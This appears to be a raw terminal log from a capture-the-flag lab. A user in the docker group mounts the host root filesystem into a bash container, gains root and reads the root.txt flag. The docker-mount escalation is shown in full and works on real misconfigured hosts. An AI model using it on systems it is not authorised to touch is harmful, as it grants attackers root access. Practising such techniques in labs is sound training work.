cd /home
jeevan@debian:/home$ ls
ls
jarretlee
jeevan@debian:/home$ groups
groups
jeevan docker
jeevan@debian:/home$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
bash latest 0980cb958276 2 years ago 13.1MB
alpine latest a24bb4013296 2 years ago 5.57MB
hello-world latest bf756fb1ae65 2 years ago 13.3kB
jeevan@debian:/home$ docker run -v /:/mnt -it bash
docker run -v /:/mnt -it bash
bash-5.0# whoami
whoami
root
bash-5.0# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-5.0# cd /root
cd /root
bash-5.0# ls -alh
ls -alh
total 8K
drwx------ 2 root root 4.0K May 29 2020 .
drwxr-xr-x 1 root root 4.0K Nov 8 18:43 ..
bash-5.0# find / -name root.txt 2>/dev/null
find / -name root.txt 2>/dev/null
/mnt/root/root.txt
bash-5.0# cat /mnt/root/root.txt
cat /mnt/root/root.txt
_ _ _ _
__ __ __ ___ | | | | o O O __| | ___ _ _ ___ | |
\ V V / / -_) | | | | o / _` | / _ \ | ' \ / -_) |_|
\_/\_/ \___| _|_|_ _|_|_ TS__[O] \__,_| \___/ |_||_| \___| _(_)_
_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_| """ |
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
bash-5.0#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
